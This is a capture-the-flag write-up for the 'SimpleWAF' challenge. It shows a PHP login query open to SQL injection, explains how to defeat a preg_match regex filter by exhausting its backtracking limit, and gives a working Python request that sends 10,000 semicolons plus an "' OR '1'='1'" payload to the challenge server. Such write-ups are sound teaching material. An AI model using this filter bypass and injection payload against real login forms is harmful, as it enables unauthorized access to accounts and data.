0xl4ugh CTF : SimpleWAF

We have access to a similar website to Micro but with a different source code.

Writeup

We are given the source code of the challenge, where we find out that there is an SQL injection through this line :

$res = $conn->query("select * from users where username='$username' and password='$password'");

But in order to exploit this SQL injection, we have to bypass this regex :

if(preg_match("/([^a-z])+/s",$input))

The regex searches for non-lowercase sequence of one or plus characters. We know that preg_match returns 1 if there is a match and 0 if there is no match. But we need to make it return 0, "false" or false while still introducing forbidden characters. Looking into the documentation, we find that preg_match returns false when it encounters an issue and one of the issue is when the function hits recursion depth.

The vulnerability lies in the + of the regex which means "one or more". When it encounters non-lowercase characters, preg_match will call for recursion in case there needs to be a backtrack and as recursion requires to store the return address, it will eventually hit smash the stack and crash.

So all we need to do is send a large number of non-lowercase characters :

import requests

data = {"username" : ";"*10_000 +"' OR '1'='1';\x00",
        "password" : "admin",
        "login-submit" : ""}
r = requests.post("http://20.115.83.90:1339/", data=data)
print(r.content)